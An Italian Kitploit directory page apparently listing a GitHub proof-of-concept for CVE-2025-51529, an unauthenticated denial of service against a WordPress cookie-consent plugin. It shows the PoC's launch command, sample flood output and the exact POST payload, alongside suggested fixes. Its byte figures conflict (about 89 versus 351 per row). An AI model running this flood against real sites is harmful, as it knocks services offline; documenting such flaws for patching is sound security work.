Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-51529 — Controllo degli accessi non corretto nella funzionalità dell'endpoint AJAX nel plugin Cookies and Content Security Policy di jonkastonka fino alla versione 2.29 | Kitploit
Strumenti/GitHubGitHub/piotrmaciejbednarski/cve-2025-51529
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubpiotrmaciejbednarski/cve-2025-51529

CVE-2025-51529

Controllo degli accessi non corretto nella funzionalità dell'endpoint AJAX nel plugin Cookies and Content Security Policy di jonkastonka fino alla versione 2.29

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web
61 anno faNon ancora revisionato

CVE-2025-51529: Vulnerabilità DoS nel plugin WordPress Cookies and Content Security Policy

Un controllo degli accessi errato nella funzionalità dell'endpoint AJAX nel plugin Cookies and Content Security Policy di jonkastonka fino alla versione 2.29 consente ad attaccanti remoti di causare una negazione del servizio (esaurimento delle risorse del server di database) tramite operazioni di scrittura illimitate sul database verso l'endpoint wp_ajax_nopriv_cacsp_insert_consent_data.

La vulnerabilità è presente nella funzione cacsp_insert_consent_data(), esposta tramite l'endpoint AJAX di WordPress (wp-admin/admin-ajax.php) senza requisiti di autenticazione. Il plugin utilizza l'azione wp_ajax_nopriv_, rendendola accessibile a utenti non autenticati.

Vettore d'attacco: gli attaccanti remoti possono inviare richieste POST concorrenti illimitate per sovraccaricare il server di database con operazioni di scrittura, causando l'esaurimento di CPU e I/O su disco.

Dettagli della vulnerabilità

  • CVE ID: CVE-2025-51529
  • Stato: RISERVATO
  • Tipo: Controllo degli accessi errato / Denial of Service
  • Prodotto: plugin Cookies and Content Security Policy fino alla versione 2.29
  • Fornitore: Johan Jonk Stenstroem (jonkastonka)
  • Funzione interessata: cacsp_insert_consent_data()
  • Vettore d'attacco: Remoto
  • Scopritore: Piotr Bednarski

Requisiti

  • Python 3.x
  • requests
  • matplotlib
  • threading

Utilizzo

L'utilizzo di base dello script PoC è il seguente:

root@kitploit:~
python payload.py --target <target_url> --threads <number_of_threads>

Per impostazione predefinita, il numero di thread è impostato a 100. È possibile specificare un numero diverso di thread fornendolo come secondo argomento.

Output di esempio

Grafico dell'attacco DoS

root@kitploit:~
Target WordPress URL (https://example.com): https://vulnerable-site.com
Number of threads (default 100): 

Launching DoS attack with 100 threads...
Press Ctrl+C to stop the attack

[19:41:20] ✓ Status: 200 | Response time: 538.3ms | DB: 0.00MB (1 rows, 351b/row)
[19:41:20] ✓ Status: 200 | Response time: 554.51ms | DB: 0.00MB (2 rows, 351b/row)
[19:41:20] ✓ Status: 200 | Response time: 522.29ms | DB: 0.00MB (3 rows, 351b/row)
[19:41:20] ✓ Status: 200 | Response time: 498.72ms | DB: 0.00MB (4 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 946.94ms | DB: 0.00MB (5 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 858.41ms | DB: 0.00MB (6 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 922.29ms | DB: 0.00MB (7 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 991.41ms | DB: 0.00MB (8 rows, 351b/row)
...
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding

Come funziona

L'exploit invia richieste POST a /wp-admin/admin-ajax.php con:

root@kitploit:~
data = {
    'action': 'cacsp_insert_consent_data',
    'accepted_cookies': 'necessary,experience,analytics,marketing',
    'expires': "9" * 255  # Maximum TINYTEXT length
}

Ogni richiesta riuscita inserisce una nuova riga nel database contenente:

  • Timestamp (19 byte)
  • Indirizzo IP (~13 byte)
  • Preferenze cookie (variabile)
  • Dati di scadenza (fino a 255 byte)
  • ID del sito (1 byte)
  • Overhead MySQL (~22 byte)

Risultato: ~89 byte per richiesta × richieste illimitate = rapida crescita del database

Correzioni consigliate

  • Aggiungere la verifica nonce per le chiamate AJAX
  • Implementare il rate limiting per IP
  • Validare correttamente gli input utente

Dichiarazione di esclusione di responsabilità

Questo PoC ha solo scopi educativi. L'autore non è responsabile per qualsiasi uso improprio o danno causato dall'utilizzo di questo codice. Ottenere sempre l'autorizzazione prima di testare qualsiasi sistema.

Scarica lo strumento